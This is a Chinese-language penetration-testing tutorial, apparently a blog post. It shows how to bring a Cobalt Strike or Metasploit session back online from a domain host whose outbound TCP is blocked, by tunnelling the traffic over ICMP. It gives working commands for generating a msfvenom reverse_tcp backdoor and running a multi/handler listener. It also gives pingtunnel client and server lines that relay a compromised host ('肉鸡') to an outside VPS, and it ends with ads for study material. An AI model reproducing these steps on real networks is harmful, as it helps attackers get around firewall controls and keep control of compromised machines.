* 1、CS-ICMP-上线
熟悉常见主机配置不出网的方式
1、入站&出站&连接安全
2、域&专用&公网&状态
3、阻止&允许&其他配置
熟悉常见主机配置不出网的方式
1、程序&端口&预定义&自定义
2、协议&TCP&UDP&ICMP&L2TP等
可以针对具体的协议进行出入站限制
有些破解软件的重要一步就是防止软件与外部网络进行连接,就会将该程序的出入站规则全部禁用。
熟悉常见主机配置不出网的操作流程
操作:组策略管理-域-创建GPO链接-防火墙设置
更新策略:强制&命令&重启
命令:gpupdate/force
域成员强制同步DC域防火墙策略
背景介绍:域控通过组策略设置防火墙规则同步后,域内用户主机被限制TCP出网,其中规则为出站规则,安全研究者通过入站取得SHELL权限,需要对其进行上线控制。
思路:正向连接&隧道技术
如果是入站被限制呢?反向连接&隧道技术也可以解决(前提看限制的多不多)
ICMP协议项目:将TCP协议数据封装成ICMP协议数据 隧道技术
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel
这里我们实验是模拟DC禁用域成员主机TCP 4455端口出网:
实战中有两种方法进行上线:
VPS:
./pingtunnel -type server
肉鸡:(管理器运行)
pingtunnel.exe -type client -l 127.0.0.1:6666 -s 10.10.10.146 -t 10.10.10.146:7777 -tcp 1 -noprint 1 -nolog 1
CS:
监听器1:127.0.0.1 5555
监听器2:10.10.10.146 6666
生成监听器1的Stager后门肉鸡以监听器二上线执行
cs-TCP流量使用pingtunnel封装icmp流量上线
生成后门:
注意这里是127.0.0.1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4455 -f exe > msf.exe
MSF启动监听:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit
Kali开启隧道:
./pingtunnel -type server 需要在目标主机上执行 需要高权限
Win开启隧道 //将本地4455icmp协议数据转发至66ip的4444流量上(管理员运行)
pingtunnel.exe -type client -l 127.0.0.1:4455 -s 47.94.xx.xx -t 47.94.xx.xx:4444 -tcp 1 -noprint 1 -nolog 1
流量是转了过来,但是不知道为什么没有生成会话。
3-13号,使用了本地kali复现成功了,真实vps没有复现成功
msf-TCP流量使用pingtunnel封装成icmp流量
注意:
接下来我将给各位同学划分一张学习计划表!
那么问题又来了,作为萌新小白,我应该先学什么,再学什么?
既然你都问的这么直白了,我就告诉你,零基础应该从什么开始学起:
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
当然,只给予计划不给予学习资料的行为无异于耍流氓,这里给大家整理了一份【282G】的网络安全工程师从入门到精通的学习资料包,可点击下方二维码链接领取哦。